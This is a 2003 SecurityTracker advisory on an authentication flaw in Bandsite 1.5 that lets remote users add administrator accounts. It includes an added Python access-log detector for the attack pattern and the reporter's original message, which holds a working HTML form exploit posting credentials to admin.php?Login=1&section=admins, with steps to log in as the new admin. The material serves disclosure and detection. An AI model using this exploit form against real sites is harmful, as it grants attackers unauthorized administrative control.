SecurityTracker.com
Category:  Application (Forum/Board/Portal)  >  Bandsite
Vendors:  de Vos, Jelle
Bandsite Portal Software Authentication Flaw Lets Remote Users Add Administrators
SecurityTracker Alert ID:  1007690
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  Sep 12 2003
Impact:  Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): 1.5
Description:  Nasser.M.Sh reported a vulnerability in Bandsite. A remote user can gain administrative access on the application.

It is reported that a remote user can submit a specially crafted POST request to the following URL to add a user account that will have administrator privileges on the application:

http://[target]/bandwebsite/admin.php?&Login=1&section=admins

The vendor has reportedly been notified without response.

Impact:  A remote user can add administrative user accounts.
Solution:  No solution was available at the time of this entry.
Vendor URL:  membres.lycos.fr/fluxx/bandwebsite.php
Cause:  Authentication error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  NaSsEr .M.Sh <nmsh_sa@yahoo.com>
Message History:   None.
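The advisory gives a single concrete indicator: an unauthenticated POST to admin.php whose query string carries Login=1 and section=admins. The following detector is an added example, not part of the SecurityTracker entry or the reporter's message. It parses Apache combined-format access log lines (the sample lines are constructed, not real traffic) and flags requests matching that pattern. It assumes, from the shape of the URL rather than from anything the advisory states, that the application treats the client-supplied Login parameter as proof of login state, so any request that carries it to admin.php is worth review; the log cannot distinguish a legitimate admin adding an account from the attack unless that parameter is present, which the example notes in its second rule.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache "combined" log format (not real traffic).
# 203.0.113.x / 198.51.100.x are documentation address ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Sep/2003:10:41:02 -0700] "GET /bandwebsite/index.php HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
203.0.113.5 - - [12/Sep/2003:10:41:09 -0700] "POST /bandwebsite/admin.php?&Login=1&section=admins HTTP/1.1" 200 812 "-" "Mozilla/4.0"
203.0.113.5 - - [12/Sep/2003:10:41:40 -0700] "POST /bandwebsite/login.php HTTP/1.1" 302 0 "-" "Mozilla/4.0"
198.51.100.7 - - [12/Sep/2003:10:42:30 -0700] "GET /bandwebsite/admin.php?section=news HTTP/1.1" 200 2210 "http://example.org/bandwebsite/admin.php" "Mozilla/4.0"
198.51.100.7 - - [12/Sep/2003:10:43:01 -0700] "POST /bandwebsite/admin.php?section=admins HTTP/1.1" 200 812 "http://example.org/bandwebsite/admin.php" "Mozilla/4.0"
203.0.113.9 - - [12/Sep/2003:11:02:17 -0700] "GET /bandwebsite/admin.php?Login=1&section=news HTTP/1.1" 200 2210 "-" "Mozilla/4.0"
"""

# Apache combined log format: ip ident user [time] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["path"])
    rec["script"] = parts.path
    # keep_blank_values so "?&Login=1" style strings still parse; the leading
    # empty pair produced by "?&" is skipped by parse_qs. Keys are lower-cased
    # so Login/login/LOGIN are treated alike.
    rec["query"] = {
        k.lower(): v
        for k, v in parse_qs(parts.query, keep_blank_values=True).items()
    }
    return rec


def classify(rec):
    """Return a finding label for one parsed record, or None if nothing matches."""
    if not rec["script"].endswith("/admin.php"):
        return None
    q = rec["query"]
    # Rule 1: the exact shape from the advisory: POST to admin.php with a
    # client-supplied Login parameter and section=admins (admin account creation).
    if "login" in q and rec["method"] == "POST" and q.get("section") == ["admins"]:
        return "admin-add via Login parameter (SecurityTracker 1007690 pattern)"
    # Rule 2 (assumption, not stated by the advisory): a legitimate session never
    # needs the client to assert Login=..., so any admin.php hit carrying it is suspect.
    if "login" in q:
        return "client-supplied Login parameter on admin.php"
    return None


def scan(log_text):
    """Scan a block of log text and return a list of findings (one dict per hit)."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        label = classify(rec)
        if label:
            findings.append(
                {"ip": rec["ip"], "ts": rec["ts"], "path": rec["path"], "finding": label}
            )
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['path']} -> {f['finding']}")
```

Run against the sample, the scan returns two findings: the POST from 203.0.113.5 that matches the advisory exactly, and the GET from 203.0.113.9 that merely carries Login=1. The POST from 198.51.100.7 to section=admins without the parameter is not flagged; it looks like an ordinary administrator action, and separating the two cases for real would need the application's session log rather than the web server's access log.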


 Source Message Contents

Date:  Fri, 12 Sep 2003 03:46:46 -0700 (PDT)
From:  NaSsEr .M.Sh <nmsh_sa@yahoo.com>
Subject:  vulnerability in Bandsite Allows Gaining Admin Access.

 


Information :
°°°°°°°°°°°°°°
- Product : Bandsite portal system
- Website : http://membres.lycos.fr/fluxx/bandwebsite.php
- Author  : Jelle de Vos
- Tested version : 1.5
- Problem : vulnerability in Bandsite Allows Gaining Admin Access.

Product Description :
°°°°°°°°°°°°°°°°°°°°°
Bandsite is an online portal system designed for Bands. Features: themes
support, news posting, audio sections, guestbook, tour guide, an admin
section to manage overall data and configurations, and more.

Exploits :
°°°°°°°°°°
=====================   nmsh.htm    ==============================
<html>
<body>
<!-- Original fragment had unbalanced tags; balanced here with the form unchanged. -->
<table cellspacing="1" cellpadding="5" width="570" bgcolor="#665E6B" border="0">
  <tbody>
    <tr><td bgcolor="#ffffff">
      <form action="http://[target]/bandwebsite/admin.php?&amp;Login=1&amp;section=admins" method="post">
        Name:<br>
        <input type="text" name="name" value="nmsh" size="20"><br>
        Pass:<br>
        <input type="text" name="pass" value="nmsh" size="20"><br>
        <input type="submit" name="submit" value="send"><br>
      </form>
    </td></tr>
  </tbody>
</table>
</body>
</html>
=====================    nmsh.htm   ==============================
The admin has been added!
:(
now go to this link :
http://[target]/bandwebsite/login.php
and login as admin
name : nmsh
pass : nmsh
Vendor:
°°°°°°°
Vendor has been contacted, no reply received.

Provided by :
°°°°°°°°°°°°°
Nasser.M.Sh
nmsh_sa(at)yahoo.com

Copyright 2002, SecurityGlobal.net LLC